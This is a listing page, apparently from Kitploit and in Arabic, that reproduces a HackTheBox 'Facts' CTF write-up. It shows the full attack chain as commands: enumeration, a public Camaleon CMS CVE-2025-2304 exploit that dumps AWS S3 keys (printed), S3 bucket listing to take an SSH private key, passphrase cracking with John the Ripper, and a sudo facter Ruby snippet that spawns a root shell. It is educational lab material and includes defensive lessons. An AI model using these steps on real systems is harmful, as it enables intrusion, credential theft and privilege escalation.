Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
htb-facts — HackTheBox — Facts (سهل/Linux) | CVE-2025-2304 + AWS S3 + مفتاح SSH + تصعيد الامتيازات عبر Facter | Kitploit
أدوات/GitHubGitHub/mattiapertusati/htb-facts
كسر كلمات المرورتصعيد الامتيازاتالاستطلاعتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبCTFاختبار الاختراقأمن السحابةالتعلم والتعليم
GitHubmattiapertusati/htb-facts

htb-facts

3منذ 4 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

HackTheBox — Facts (سهل/Linux) | CVE-2025-2304 + AWS S3 + مفتاح SSH + تصعيد الامتيازات عبر Facter

عرض المستودع

HTB — Facts (Easy/Linux) - Season 10

HTB Difficulty OS Status Techniques Techniques PrivEsc

ملخص

Facts جهاز Easy Linux يتطلب استغلال ثغرة معروفة (CVE-2025-2304) في Camaleon CMS لاستخراج بيانات اعتماد AWS S3 المحلية. يكشف تعداد دلاء S3 الداخلية عن مفتاح SSH خاص يجب كسره باستخدام John the Ripper للحصول على وصول أولي. يتم تحقيق تصعيد الامتيازات عبر استغلال خطأ في إعداد sudo على /usr/bin/facter، مما يسمح بتنفيذ كود Ruby مخصص للحصول على صلاحيات الجذر (root).

سلسلة الهجوم: Nmap → Camaleon CMS (CVE-2025-2304) → تعداد دلاء S3 → كسر مفتاح SSH → sudo facter → Root


الاستطلاع

فحص المنافذ

لنبدأ بفحص Nmap لتحديد الخدمات النشطة على الجهاز الهدف. Bash

root@kitploit:~
nmap -sV -sC -oN nmap_facts 10.129.244.96

النتائج:

PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 9.9p1 Ubuntu 3ubuntu3.2 (Ubuntu Linux; protocol 2.0) 80/tcp open http nginx 1.26.3 (Ubuntu) |_http-title: facts |_http-server-header: nginx/1.26.3 (Ubuntu)

Nmap Scan

يكشف Nmap عن منفذين مفتوحين: 22 (SSH) و80 (HTTP). يعتمد خادم الويب على Nginx. قبل أن نتمكن من التعامل مع الموقع بشكل صحيح، يجب إضافة المضيف facts.htb إلى ملف /etc/hosts لدينا.

root@kitploit:~
echo “10.129.244.96 facts.htb” | sudo tee -a /etc/hosts

تعداد الويب

عند زيارة الموقع على المنفذ 80، تظهر لنا صفحة ويب عادية. لاكتشاف المسارات المخفية، نطلق هجوم تخمين مسارات (على سبيل المثال، باستخدام ffuf أو gobuster).

root@kitploit:~
ffuf -w /usr/share/wordlists/dirb/common.txt -u http://facts.htb/FUZZ

يكشف التعداد عن عدة أدلة مثيرة للاهتمام تتعلق بلوحة الإدارة (/admin, /admin.php, etc.), وكلها تعيد توجيه برمز حالة 302 إلى http://facts.htb/admin/login.

Enumeration

من خلال زيارة صفحة تسجيل الدخول والمصادقة (أو النظر إلى تذييل اللوحة)، نكتشف التقنية التي يعمل بها الموقع: Camaleon CMS.

تفاصيل مهمة تلفت انتباهنا في الزاوية السفلية اليمنى: إصدار النظام هو 2.9.0.

Admin Panel


الاستغلال

Camaleon CMS (CVE-2025-2304)

بمعرفتنا أن الخادم يعمل بنظام Camaleon CMS 2.9.0، يؤدي بحث سريع عبر الإنترنت إلى اكتشاف ثغرة حرجة تُعرف باسم CVE-2025-2304، والتي تسمح بـتصعيد الامتيازات من مستخدم مصادق إلى مسؤول.

نجد استغلالًا عامًا على GitHub (من إنشاء Alien0ne) ونقوم بتنزيله على جهاز المهاجم.

GitHub Exploit

نطلق الاستغلال بتمرير بيانات الاعتماد بحوزتنا (e.g., mattia:mattia) لرفع صلاحياتنا إلى مسؤول، واستخراج المعلومات الحساسة، ثم العودة إلى الدور الأصلي لعدم ترك آثار واضحة.

root@kitploit:~
python3 exploit.py -u http://facts.htb -U mattia -P mattia --newpass mattia -e -r

مخرجات الاستغلال كنز ثمين: تمكننا من استخراج بيانات اعتماد AWS S3 المحلية ونقطة النهاية الداخلية التي يستخدمها الخادم.

  • S3 Access Key: AKIAA103ACAA5953D888

  • S3 Secret Key: ELsaDX4pIZYwPJf+dVdUuoHtkwGsRPvKIGCmDfiR

  • S3 Endpoint: http://localhost:54321 (والذي يصبح http://facts.htb:54321 بالنسبة لنا)

Exploit


تعداد دلاء S3

باستخدام هذه المفاتيح، يمكننا تكوين واجهة AWS CLI المحلية للتفاعل مع خدمة S3 المكشوفة على الجهاز.

root@kitploit:~
aws configure
# أدخل مفتاح الوصول والمفتاح السري اللذين وجدناهما للتو
# المنطقة الافتراضية: us
# تنسيق الإخراج الافتراضي: json

الآن يمكننا سرد الدلاء المتاحة عن طريق تمرير عنوان نقطة النهاية المخصص:

root@kitploit:~
aws --endpoint-url http://facts.htb:54321 s3 ls

نجد دلاءين: internal وrandomfacts. من خلال استكشاف دلو internal بشكل متكرر، نكتشف مجلد .ssh يحتوي على مفاتيح!

root@kitploit:~
aws --endpoint-url http://facts.htb:54321 s3 ls s3://internal/.ssh/ --recursive

لنقم بتنزيل ملف id_ed25519 (مفتاح SSH الخاص) إلى جهازنا.


كسر مفتاح SSH

لدينا المفتاح الخاص، لكنه محمي بعبارة مرور. لكسرها، سنستخدم مجموعة أدوات John the Ripper. أولاً، سنحول المفتاح إلى صيغة يمكن لجون قراءتها باستخدام ssh2john:

root@kitploit:~
ssh2john id_ed25519 > hash.txt

بعد ذلك، نطلق هجوم القاموس (باستخدام قائمة الكلمات المخصصة my_guess.txt أو القائمة الكلاسيكية rockyou.txt):

root@kitploit:~
john --wordlist=my_guess.txt hash.txt

تم كسر كلمة المرور بنجاح: dragonballz. الآن لدينا كل ما نحتاجه للوصول إلى الخادم!

Exploit


تصعيد الامتيازات

الآن بعد أن أصبح لدينا كل ما نحتاجه، يمكننا الاستفادة من المنفذ المفتوح الثاني الذي وجدناه سابقًا: منفذ SSH (22).

root@kitploit:~
ssh -i id_ed25519 [email protected]

سنستخدم كلمة المرور التي وجدناها سابقًا: dragonballz. لقد دخلنا!

الآن نحتاج إلى معرفة المسار الذي يمكننا استغلاله للحصول على صلاحيات root، لذا سنستخدم sudo -l.

المسار:

/usr/bin/facter

لاستغلال هذا المسار، سنستخدم سكربتًا صغيرًا:

root@kitploit:~
echo 'Facter.add(:pwn) do
  setcode do
    exec (“/bin/bash -p”)
  end
end' > /tmp/pwn.rb

ثم نقوم بتشغيله:

root@kitploit:~
sudo /usr/bin/facter --custom-dir=/tmp pwn

SSH

نحن الآن root رسميًا!!!

كل ما تبقى هو العثور على العلمين :)

FLAG


الدروس المستفادة

منظور هجومي

  • الكشف عن إصدار النظام في التذييل/الترويسات يكشف سطح الهجوم فورًا
  • البحث عن ثغرات CVE لإصدارات محددة هو دائمًا الخطوة الأولى بعد تحديد البصمة
  • الخدمات الداخلية مثل S3 يمكن أن تكشف بيانات حساسة ليس من المفترض أن تكون عامة
  • مفاتيح SSH الخاصة المخزنة في التخزين السحابي هي خطأ إعداد حرج يُشاهد في البيئات الحقيقية

منظور دفاعي

  • لا تضع بيانات اعتماد AWS في كود التطبيق أو في تخزين يمكن الوصول إليه
  • قيّد صلاحيات دلاء S3 — يجب ألا تكون الدلاء الداخلية قابلة للتعداد علنًا أبدًا
  • راجع صلاحيات sudo بانتظام — facter مع NOPASSWD هو مسار مباشر إلى صلاحيات root
  • حافظ على تحديث برامج CMS — ثغرة CVE-2025-2304 كان لها تصحيح متاح

ملخص سلسلة الهجوم

NMAP — تم اكتشاف منفذين (22, 80) ↓ تعداد الويب — العثور على قسم الإدارة ↓ Camaleon CMS -> CVE-2025-2304 ↓ الاستغلال + إعدادات AWS ↓ John the ripper لكسر الهاش ↓ تسجيل الدخول عبر SSH ↓ Sudo -l ↓ سكربت + تنفيذ ↓ ROOT ✅


المراجع

  • CVE-2025-2304
  • Camaleon CMS
  • GTFOBins — facter
  • HackTheBox — Facts
تنزيل الأداة